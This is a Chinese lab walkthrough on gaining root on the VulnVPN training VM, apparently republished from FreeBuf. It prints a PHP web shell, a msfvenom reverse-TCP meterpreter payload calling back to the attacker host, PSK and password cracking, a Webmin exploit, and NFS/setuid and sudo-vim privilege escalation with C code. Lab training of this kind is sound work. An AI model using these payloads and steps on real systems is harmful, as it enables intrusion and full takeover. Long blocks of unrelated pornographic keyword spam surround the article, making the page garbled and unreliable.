精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

安全 漏洞 數(shù)據(jù)安全
VulnVPN是一款十分優(yōu)秀的對VPN進行滲透測試的漏洞平臺工具。我不得不說,因為這款軟件,使得我們在進行VPN的安全性測試的時候方便了很多。我這篇文章就將帶領(lǐng)大家進行一次VPN的安全性測試,看一下如何一步步地成功的獲取一臺VPN的Root權(quán)限。

VulnVPN是一款十分優(yōu)秀的對VPN進行滲透測試的漏洞平臺工具。我不得不說,因為這款軟件,使得我們在進行VPN的安全性測試的時候方便了很多。我這篇文章就將帶領(lǐng)大家進行一次VPN的安全性測試,看一下如何一步步地成功的獲取一臺VPN的Root權(quán)限。

環(huán)境配置

需要首先下載VulnVPN軟件,下面是下載地址:

VulnVPN下載地址:http://www.rebootuser.com/wp-content/uploads/vulnvpn/VulnVPN.7z

VulnVPN客戶端文件:http://www.rebootuser.com/wp-content/uploads/vulnvpn/client.7z

在此之前我試過了Kali Linux的32位和64位版本來安裝,但是發(fā)現(xiàn)是行不通的(應(yīng)該是系統(tǒng)版本問題),所以這里我就選擇了使用Backtrack 5 r3 32位的版本安裝了一個虛擬機

首先,我們需要修改一下網(wǎng)絡(luò)環(huán)境,這里我們打開虛擬網(wǎng)絡(luò)編輯器,然后把NAT IP地址改成192.168.0.0,如下圖所示:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們將使用下面這臺Backtrack 5 r3 32位(以下簡稱BT5)的虛擬機作為攻擊機

現(xiàn)在我們新建一臺虛擬機然后把BT5安裝進去,安裝過程這里我們就略過不講,對于FreeBufer來說肯定不是一件困難的事情

要使的我們的VulnVPN能夠正常工作,首先我們需要安裝下面三個包:

1、openswan
2、xl2tpd
3、ppp

安裝命令如下:

apt-get install openswan xl2tpd ppp

安裝完成之后,這樣攻擊需要的環(huán)境我們就搭好了。這時候我們啟動我們下載的VulnVPN,我們將完全不對其進行任何修改,不進行任何操作,我們就假裝這個VPN就是一個遠程VPN,真的遠程VPN我們怎么可能碰得到呢對吧:)

然后我們需要在BT5攻擊機上設(shè)置一個靜態(tài)IP,做法也很簡單,只需要打開/etc/network/interfaces文件,然后給eth0網(wǎng)口指定靜態(tài)的IP就可以了,內(nèi)容為下:

auto eth0
iface eth0 inet dhcp
#iface eth0 inet static
address 192.168.0.11
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1

然后我們需要下載上面的VPN Client文件,然后解壓進行配置,具體的方式如下:

root@bt:~/vulnvpn/client# ls
ipsec.conf ipsec.secrets ppp start-vpn.shxl2tpd
root@bt:~/vulnvpn/client# cp ipsec.conf/etc/
root@bt:~/vulnvpn/client# cp ipsec.secrets/etc/
root@bt:~/vulnvpn/client# cpppp/options.l2tpd.client /etc/ppp/
root@bt:~/vulnvpn/client# cpxl2tpd/xl2tpd.conf /etc/xl2tpd/

#p#

開始進行滲透

我們使用以下命令來查看以下網(wǎng)絡(luò)的環(huán)境:

root@bt:~/vulnvpn# netdisocver -r192.168.0.0/24

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

對192.168.0.10主機進行TCP端口掃描

這里我們使用神器nmap對上面發(fā)現(xiàn)的VulnVPN主機進行端口掃描(關(guān)于nmap的具體使用方法大家可以點這里:http://www.freebuf.com/articles/network/32302.html):

root@bt:~/vulnvpn# nmap -A 192.168.0.10

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

對192.168.0.10主機進行UDP端口掃描

root@bt:~/vulnvpn# nmap -sU 192.168.0.10

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

Note:以上掃描結(jié)果中的靶機中的81端口只是預(yù)留為解決緊急狀況的,并非我們的攻擊目標(biāo)和方向。

通過掃描,我們發(fā)現(xiàn)VulnVPN在500端口上運行了isakmp服務(wù),關(guān)于這個服務(wù)的詳細信息,你可以點擊這里查看:http://www.networksorcery.com/enp/protocol/isakmp.html

然后我們將對這個服務(wù)進行深入的信息收集,但是這個時候繼續(xù)使用nmap肯定是力不從心了,這里我們使用ike-scan工具進行下一步的工作(ike-scan是一款基于命令行的工具,主要有主機發(fā)現(xiàn),指紋識別等功能,可以用來測試IPSec VPN服務(wù)器)#p#

然后我們使用該工具進行主機掃描:

root@bt:~/vulnvpn# ike-scan -M -A-Pike-hash -d 500 192.168.0.10

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

下面是關(guān)于該工具的幾個參數(shù)的解釋:

-M:縮進式輸出
-A:攻擊模式
-P<文件名>:指定寫入預(yù)共享key的文件名
-d:目標(biāo)機器的UDP端口

這里我們獲得的ike-hash文件中的預(yù)共享key可以使用psk-crack進行破解,破解過程如下:

root@bt:~/vulnvpn# psk-crack -d/pentest/passwords/wordlists/rockyou.txt ike-hash

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

很快我們就得到了密碼,密碼為123456,這里我們就可以使用這個密碼連接VulnVPN了

編輯/etc/ipsec.secrets文件,然后將ENTER_PSK_HERE字段改為123456,命令如下:

root@bt:~/vulnvpn# nano /etc/ipsec.secrets

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

然后我們重啟一下ipsec服務(wù):

root@bt:~# /etc/init.d/ipsec restart

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

然后我們可以用以下命令看一下已經(jīng)啟動的服務(wù):

root@bt:~# service –status-all

如果xl2tpd服務(wù)沒有啟動起來,這個時候還需要啟動一下:

root@bt:~# /etc/init.d/xl2tpd start

現(xiàn)在我們連接VulnVPN:

root@bt:~# ipsec auto –up vpn

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

然后我們運行client文件中的start-vpn.sh文件,如果前面的配置沒有問題,這個時候我們應(yīng)該可以看到建立了一個ppp0的接口:

root@bt:~/vulnvpn/client# sh start-vpn.sh
root@bt:~/vulnvpn/client# ifconfig

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們可以用以下命令看一下活動主機:

root@bt:~/vulnvpn# for ip in10.99.99.{1..255};
 do ping -c 1 -t 1 $ip > /dev/null && echo “${ip}is up”;
 done

VPN漏洞測試平臺滲透學(xué)習(xí)筆記 

我們知道,10.99.99.2是我們的VPN IP地址,而10.99.99.1則是VPN地址。#p#

然后我們對10.99.99.1進行端口掃描:

root@bt:~/vulnvpn# nmap -A -p1-6553510.99.99.1

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們可以看到在10.99.99.1的80端口運行著HTTP服務(wù),我們看下是個什么東西

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

看起來沒什么特殊的東西,沒關(guān)系,我們接著看10000端口:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

 

我們首先分析這個HTTP服務(wù)。我們可以從上圖看到,這就是一個Apache HTTP服務(wù)安裝之后的默認(rèn)頁面,沒什么特殊的東西。我們需要對其進行深入的掃描分析才能得到更多的信息,這里我們使用DirBuster對其進行進一步的掃描:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

過程不過多描述,上結(jié)果:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們從結(jié)果可以看出來,在HTTP服務(wù)上搭了一個WordPress。好奇心驅(qū)使我們看一下這個WP頁面:

http://10.99.99.1/wordpress/

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

這里是一個主站的上傳頁面:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

看到這里,首先反應(yīng)就是看看有沒有解析漏洞,這里我們試一下傳一個php一句話(cmd.php):

 

  1. <?php  
  2. highlight_string(shell_exec($_REQUEST['cmd']));  
  3. ?> 

 

WordPress默認(rèn)的上傳路徑是/wp-content/uploads/,我們訪問看一下:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

經(jīng)過查看,我們發(fā)現(xiàn)我們上傳的PHP文件的路徑是rsjp/attachments/ 文件夾下,但是文件名改成了一串隨機字符串。我們可以通過這里得到一個web shell:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

得到shell就等于成功了大半,我們可以使用命令獲取一個meterpreter,當(dāng)然,首先我們需要生成一個meterpreter php shell:

msfvenom -p php/meterpreter/reverse_tcpLHOST=10.99.99.2 LPORT=4444 -f raw > meter.php

#p#

然后我們開啟一個handler進行監(jiān)聽:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

然后我們就得到了一個meterpreter會話。但是這里直接使用shell不是特別方便,我們使用python獲取一個交互的shell:

Meterpreter> shell
python -c “importpty;pty.spawn(‘/bin/bash’);”

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們查看一下passwd文件:

www-data@vulnvpn:/$ cat /etc/passwd

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

分析passwd文件,我們可以看到幾個有趣的用戶:

root
www-data
bob
jane

不要忘了,我們在之前分析的時候還有一個運行在10000端口的login頁面:https://10.99.99.1:10000/

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

這里我們不知道密碼是什么,不過我們可以使用上面第一個漏洞獲取到的信息來創(chuàng)建一個user列表,密碼我們用一些常見密碼,然后在這里進行猜解,下面是一組猜解得到的結(jié)果:

User Password
bob bob

Note:過多次的嘗試將會使IP被短時間列入黑名單。

VPN漏洞測試平臺滲透學(xué)習(xí)筆記 

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

然后我們在msf中搜一下,看看有沒有webmin相關(guān)的公開漏洞

我們運氣不錯,經(jīng)過搜索,我們找到了一個公開的exp:

Metasploit:exploit/unix/webapp/webmin_show_cgi_exec

Note:找不到這個exp說明你的msf需要升級了

然后我們使用這個exp來獲取服務(wù)器的root權(quán)限:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

#p#

另一種獲取root的方式

這里我們使用hydra的字典模式對SSH服務(wù)進行暴力破解,然后跟上面一樣,假裝我們已經(jīng)獲取到了用戶名和密碼(說起來容易。。。不過要是有跟黑客叔叔p0tt1一樣的運氣肯定是很簡單的)

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

 

從Nmap的掃描結(jié)果我們可以看到一個網(wǎng)絡(luò)文件系統(tǒng)(NFS)

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們載入一個msf中的一個NFS掃描模塊:

Metasploit: auxiliary/scanner/nfs/nfsmount

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

這里我們可以看到有一個路徑/home/bob是存在的

我們掛載一下看一下:

root@bt:~/vulnvpn# mount10.99.99.1:/home/bob /root/vulnvpn/bob -o nolock

然后列一下文檔:

root@bt:~/vulnvpn# ls -lah ./bob

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

擦擦擦!為毛所有的文件都是postgres用戶?

問題的答案是,當(dāng)NFS掛載之后,文件的所屬的權(quán)限并非通過用戶名和組傳遞的,傳遞的是UID和GID,所以到了本機之后就變成了一個本機存在的用戶名,即postgres,而這個用戶是BT5機器上的而非VulnVPN的。我們可以查看我們BT5的passwd文件我們會發(fā)現(xiàn)UID為1000的用戶恰好為postgres。而現(xiàn)在我們使用之前第一個漏洞,讀出VulnVPN的/etc/passwd文件內(nèi)容,我們可以看到VulnVPN中UID為1000的用戶為bob。

言歸正傳,我們使用BT5的root權(quán)限嘗試在NFS中寫入一個文件時,我們發(fā)現(xiàn)出錯了:

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

這是因為,NFS開啟了“Root Squashing”,所以這時候我們使用root是不行的,所以這個時候我們切換到UID為1000的用戶,本機則為postgres,這樣我們再去創(chuàng)建文件就不會出現(xiàn)任何問題了

root@bt:~/vulnvpn# su postgres
sh-4.1$ chmd 777

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們把/bin/bash文件復(fù)制到./bob下:

sh-4.1$ cp /bin/bash ./

因為root是沒有掛載文件夾的寫入權(quán)限的,而且我們已經(jīng)有了一個從www-date返回的shell,其權(quán)限是ID為1001的名為jane的用戶。我們可以在本地新建一個相同信息的用戶:

root@bt:~/vulnvpn# useradd -u 1001 jane

現(xiàn)在我們切換到剛建的這個用戶:

root@bt:~/vulnvpn/bob# su jane
sh-4.1$ whoami

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

用jane用戶將/bin/bash拷貝到掛載目錄,同時修改其權(quán)限為4777,這就意味著無論是誰調(diào)用這個bash都將得到j(luò)ane這個賬戶的權(quán)限

sh-4.1$ cp /bin/bash ./mybash
sh-4.1$ chmod 777 mybash

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

先前我們暴力破解到的用戶名和密碼就起到作用了,我們使用SSH登錄:

root@bt:~/vulnvpn/bob# ssh bob@10.99.99.1

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

現(xiàn)在我們附加-p參數(shù)運行我們剛剛復(fù)制過來的bash:

bob@vulnvpn:~$ ./mybash –p

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

從圖里我們可以看出來,現(xiàn)在我們是用jane用戶登錄的,但是UID和GID都還是bob用戶的,那么我們就可以借用這一點想辦法提權(quán)

為了達到目的,我這里寫了一段C(priv1.c):

void main()
{
/* setreuid(ruid,euid)sets the real andeffective user IDs of the current process to the values specified by the ruidand euid arguments */
setreuid(1001,-1);
char *args[] = {“/bin/bash”,0};
execve(args[0],args,0);
}

我們編譯這段C,然后將編譯后的文件以用戶jane身份復(fù)制到掛載到NFS中

在此之前,當(dāng)然是需要安裝gcc的,沒有的可以自己安裝一下

root@bt:~/vulnvpn#apt-get install gcc

然后我們進行編譯:

root@bt:~/vulnvpn# gcc priv1.c -o priv1
root@bt:~/vulnvpn# chmod 777 priv1
root@bt:~/vulnvpn# cd bob
root@bt:~/vulnvpn/bob# su jane
sh-4.1$ cp ../priv1 ./

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

現(xiàn)在,我們返回SSH會話中執(zhí)行這個編譯好的文件:

mybash-4.1$ ./priv1

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們試一下運行root權(quán)限的命令:

jane@vulnvpn:/home/bob$ sudo –l

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

我們發(fā)現(xiàn)用jane用戶我們可以運行root權(quán)限的命令(比如vim)而不需要輸入密碼

如果你不清楚是不是這樣的,那我們就試一下:

jane@vulnvpn:/home/bob$ vim

運行vim之后,我們按下”:”然后輸入”!<命令>”

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

 

我們開一個shell…

jane@vulnvpn:/home/bob$ sudo vim

VPN漏洞測試平臺滲透學(xué)習(xí)筆記

得到root權(quán)限。

參考來源:resources.infosecinstitute.com

責(zé)任編輯:藍雨淚 來源: FreeBuf
相關(guān)推薦

2017-02-09 10:30:51

FaradayIPEIDE

2013-12-30 13:11:03

2013-11-28 10:32:10

2013-12-10 09:51:18

2013-12-24 13:15:59

2014-04-03 09:35:28

2013-11-28 11:29:39

2013-11-28 13:03:17

2014-02-18 15:53:04

2014-12-12 11:25:50

2010-08-16 10:56:35

2020-07-13 07:18:26

滲透測試漏洞掃描工具

2021-12-21 06:23:43

TIWAP安全工具滲透測試

2012-10-23 16:28:51

2018-10-21 08:14:49

2011-05-13 14:20:19

2014-07-18 14:44:13

2011-12-26 11:22:48

2015-06-24 09:53:05

2021-05-20 10:16:44

Web滲透漏洞
點贊
收藏

51CTO技術(shù)棧公眾號

日韩三级视频在线看| 亚洲精品精品亚洲| 国产有码在线一区二区视频| 国产成人久久久久| 麻豆一区一区三区四区| 日本乱人伦aⅴ精品| 婷婷视频在线播放| 免费av网站在线播放| 免费成人你懂的| 国内精品400部情侣激情| 一二三四国产精品| 加勒比视频一区| 在线不卡a资源高清| 欧美在线观看www| 超碰在线免费公开| 337p粉嫩大胆噜噜噜噜噜91av| 91精品国产综合久久香蕉最新版 | 91精品天堂福利在线观看| 亚洲韩国日本中文字幕| 国产永久免费网站| 在线视频超级| 亚洲一二三专区| 亚洲视频欧美在线| 美女毛片在线看| 菠萝蜜视频在线观看一区| 国产精品一区专区欧美日韩| 成年人午夜视频| 中文字幕一区二区三区在线视频| 国产亚洲a∨片在线观看| 日本一区二区免费视频| 成人乱码手机视频| 在线亚洲免费视频| 国产a级一级片| 波多野在线观看| 亚洲色图欧美激情| 一本久久a久久精品vr综合 | 91麻豆国产在线| 亚洲欧美网站| 91精品国产成人| 久久老司机精品视频| 亚洲二区三区不卡| 久久激情视频免费观看| 日韩欧美视频免费观看| 精品一区二区三区在线| 亚洲欧洲在线免费| 91久久免费视频| 精品一区三区| 亚洲色图25p| 精品人妻一区二区三区视频| 青青久久av| 日韩av在线影院| 喷水视频在线观看| 日本久久成人网| 亚洲精品福利在线观看| v天堂中文在线| 日韩激情毛片| 亚洲欧洲激情在线| 91精品久久久久久久久久久久| 免费欧美视频| 一区二区日韩精品| 91视频最新网址| 亚洲精品888| 欧美情侣性视频| 久久久久性色av无码一区二区| 欧美日韩三级| 国模私拍视频一区| 亚洲av无码精品一区二区| 裸体素人女欧美日韩| 国产精品流白浆视频| 一级做a爱片性色毛片| 国产久卡久卡久卡久卡视频精品| 99热最新在线| 熟妇人妻一区二区三区四区 | 欧美成人综合一区| 国产尤物视频在线| 亚洲欧洲日韩在线| 男人添女荫道口女人有什么感觉| 成人ssswww在线播放| 欧美日韩精品二区| 久久综合伊人77777麻豆最新章节| 人人玩人人添人人澡欧美| 欧美一区二区三区婷婷月色| 亚洲av无码成人精品区| 一区二区导航| 久久亚洲精品国产亚洲老地址| 久久久久噜噜噜亚洲熟女综合| 国产日韩1区| 国产日韩欧美中文在线播放| 亚洲精品第五页| 日本一区二区综合亚洲| 三级在线免费观看| 国产高清不卡| 欧美一区二区三区的| 国产精品九九九九九| 日韩欧美自拍| 91精品国产91久久久| 一级黄色大毛片| 9l国产精品久久久久麻豆| 少妇特黄a一区二区三区| 日本一级理论片在线大全| 日本高清成人免费播放| 少妇熟女视频一区二区三区| 精品产国自在拍| 欧美极品少妇xxxxⅹ免费视频| 日批视频免费在线观看| 从欧美一区二区三区| 亚洲国产精品一区在线观看不卡 | 国产精品夜间视频香蕉| 嫩草影院一区二区| 国产精品成人免费在线| 尤物av无码色av无码| 在线日韩三级| 亚洲天堂男人天堂| 日韩欧美一区二区一幕| 精东粉嫩av免费一区二区三区| 鲁丝片一区二区三区| 欧美人体视频xxxxx| 欧美日韩三级一区| 人妻体内射精一区二区| 激情五月***国产精品| 成人女保姆的销魂服务| 国产在线超碰| 欧美性猛xxx| 日韩av无码一区二区三区不卡| 国产精品福利在线观看播放| 国产精品久久久久久久久久久不卡 | 欧美精品日韩在线| 亚洲影院在线| 极品日韩久久| h片在线观看视频免费免费| 91精品国产黑色紧身裤美女| av资源在线免费观看| 日韩成人av影视| 欧美另类高清视频在线| 蜜桃麻豆影像在线观看| 亚洲第一页在线| 免费一级a毛片夜夜看 | 亚洲最大av网站| 欧洲日本在线| 欧美熟乱第一页| 成人做爰69片免网站| 三级久久三级久久| 欧美激情第六页| 午夜精品久久久久久久久久蜜桃| 日韩av一区在线| 日韩毛片一区二区三区| 99久久免费国产| 国产精品宾馆在线精品酒店| 伦理一区二区| 欧美最猛性xxxxx(亚洲精品)| 亚洲人视频在线观看| 精品magnet| 欧美熟妇一区二区| 久久亚洲综合| 亚洲精品一区二区三区蜜桃久| 岛国一区二区| 久久久精品网站| 亚洲xxx在线| 亚洲国产日韩精品| 成人手机在线免费视频| 午夜亚洲福利在线老司机| 日本不卡一区二区三区在线观看| 美女写真久久影院| www亚洲欧美| 精品久久久中文字幕人妻| 亚洲自拍偷拍av| 美女又爽又黄免费| 欧美一级专区| 亚洲春色综合另类校园电影| 在线不卡一区| 久久欧美在线电影| 巨骚激情综合| 欧美福利视频导航| 日本三级片在线观看| 91麻豆精东视频| 三上悠亚在线一区| 一区二区电影在线观看| 国产亚洲欧美一区二区| 日韩欧美一区二区三区免费观看| 日韩中文综合网| 丰满大乳国产精品| 91福利在线看| 九九热最新地址| 91麻豆视频网站| 制服丝袜综合网| 国产精品激情电影| 欧美日本亚洲| 精品入口麻豆88视频| 7777精品久久久久久| √天堂资源地址在线官网| 欧美一卡二卡在线| 欧美一区二区三区网站| 亚洲精品中文在线| 91精品人妻一区二区三区蜜桃欧美| 日韩国产高清在线| 丁香六月激情网| 日韩欧美精品一区| 精品国产免费人成电影在线观...| 欧美黄页免费| 91av中文字幕| 在线看三级电影| 亚洲无线码在线一区观看| 99久久精品日本一区二区免费 | 亚洲精品合集| 亚洲aaa激情| 日韩精品一区二区三区av| 欧美激情综合亚洲一二区| 超碰在线国产| 亚洲国产一区二区三区在线观看| 97人人爽人人爽人人爽| 色综合久久久久综合| 久草视频免费在线| 国产精品乱人伦| 成人片黄网站色大片免费毛片| 国产成人精品一区二| 粉色视频免费看| 日韩高清一区在线| 哪个网站能看毛片| 黄色一区二区三区四区| 法国空姐在线观看免费| 日韩亚洲一区在线| 日韩视频在线播放| 亚洲成在人线免费观看| 精品国产一区二区三| jazzjazz国产精品麻豆| 亚洲一区免费网站| 日韩精品第二页| 国产精品影片在线观看| 性欧美gay| 青草青草久热精品视频在线观看| 2021中文字幕在线| 欧美—级高清免费播放| 视频在线这里都是精品| 久久视频在线看| 九七久久人人| xxx一区二区| 日本网站在线免费观看视频| 日韩在线视频观看| 91福利在线视频| 中文字幕日韩欧美在线视频| 福利片在线观看| 亚洲视频日韩精品| 国产尤物视频在线| 中文字幕精品一区二区精品| 成人精品福利| 丝袜美腿亚洲一区二区| 五月天婷婷在线视频| 日韩在线观看网址| 欧美精品电影| 久久亚洲国产成人| 人人超在线公开视频| 欧美国产日韩视频| 超碰在线97国产| 热re91久久精品国99热蜜臀| 新片速递亚洲合集欧美合集| 国产精品视频公开费视频| 久久人体av| 91精品久久久久久蜜桃| 成人av动漫| 久久久久久国产精品一区| 精品国产一区二区三区噜噜噜 | 国产精品资源在线看| 男人女人拔萝卜视频| 成人高清在线视频| av黄色免费网站| 国产精品欧美极品| 免费无遮挡无码永久在线观看视频 | 无码人妻丰满熟妇区bbbbxxxx| 欧美图片一区二区三区| 国产精品女同一区二区| 亚洲成av人片在线观看香蕉| 青青草娱乐在线| 最近中文字幕日韩精品 | 日本91av在线播放| 国产精品天堂蜜av在线播放 | 亚洲伦理在线精品| 日韩三级视频在线| 欧美无乱码久久久免费午夜一区| 国产美女永久免费| 国产视频精品xxxx| 免费看美女视频在线网站| 欧美激情亚洲国产| 国产成人免费9x9x人网站视频| 91精品免费久久久久久久久| 成人知道污网站| 性欧美.com| 国户精品久久久久久久久久久不卡| 漂亮人妻被中出中文字幕| 国模娜娜一区二区三区| 亚洲一区二区三区无码久久| 国产精品久久久久桃色tv| 国产精品第一页在线观看| 欧美综合视频在线观看| 亚洲精品久久久久avwww潮水| 亚洲欧美制服中文字幕| 牛牛电影国产一区二区| 国产精品久久久久久超碰 | 456亚洲精品成人影院| 亚洲free性xxxx护士白浆| 九一亚洲精品| 久久人人爽人人爽人人av| 日韩成人精品在线观看| 精品1卡二卡三卡四卡老狼| 国产精品久久久久久久久晋中| 日韩av大片在线观看| 欧美一级理论片| 亚洲视频tv| 国产精品18久久久久久首页狼| 一区二区三区在线免费看| 亚洲欧洲精品一区| 母乳一区在线观看| 亚洲欧洲日韩综合| 亚洲同性gay激情无套| 伊人成年综合网| 国产午夜精品久久久| 91九色美女在线视频| 91美女片黄在线观| 久久高清免费| 成年人免费大片| 91亚洲国产成人精品一区二三| 91九色丨porny丨极品女神| 欧美丝袜丝交足nylons| 国产最新视频在线观看| 欧美一级大片视频| 国产精品香蕉| 欧日韩免费视频| 国产99精品国产| 久久久精品国产sm调教网站| 91麻豆精品国产91久久久久久 | 深夜福利久久| 国产91对白刺激露脸在线观看| 成人丝袜18视频在线观看| 欧美成人精品欧美一级| 欧美一区二区三区免费在线看 | 第一社区sis001原创亚洲| 97成人在线观看视频| av在线不卡电影| 成人毛片18女人毛片| 亚洲奶大毛多的老太婆| 一区二区三区四区日本视频| 久久久久无码国产精品一区| 亚洲综合国产激情另类一区| 日本丰满少妇裸体自慰| 色综合一区二区| 高清性色生活片在线观看| 国产精品久久久久久亚洲影视 | 免费网站永久免费观看| 国产成人a级片| 国产无精乱码一区二区三区| 亚洲国产精品999| 一区二区三区短视频| 日韩国产精品一区二区| 青青青伊人色综合久久| 91av手机在线| 欧美一级理论片| аⅴ资源天堂资源库在线| 精品麻豆av| 日韩成人免费在线| 疯狂撞击丝袜人妻| 精品三级在线看| 蜜桃av.网站在线观看| 视频一区亚洲| 国产一区二区久久| 日韩精品一区二区av| 亚洲免费高清视频| 色999韩欧美国产综合俺来也| 一本色道久久88亚洲精品综合| 成人在线综合网| 成人免费视频毛片| 视频在线观看99| 91蝌蚪精品视频| 青青在线视频免费| 成人欧美一区二区三区| 亚洲h视频在线观看| 日本sm极度另类视频| 91视频综合| 亚洲色图欧美日韩| 欧美性一区二区| 久草在线视频网站| 久久综合色一本| 韩国欧美国产1区| 日本在线观看视频网站| 在线中文字幕日韩| 高清精品视频| 网站一区二区三区| 亚洲综合图片区| 97在线观看免费观看高清| 国产在线观看不卡| 宅男噜噜噜66一区二区| 蜜桃视频最新网址| 亚洲精品国产品国语在线| 玖玖精品在线| 可以在线看的av网站| 中文字幕一区二区三区精华液| 欧美一级片免费| 成人免费福利视频| 亚洲综合国产| 久草免费在线观看视频| 中文字幕av一区二区| 美女午夜精品|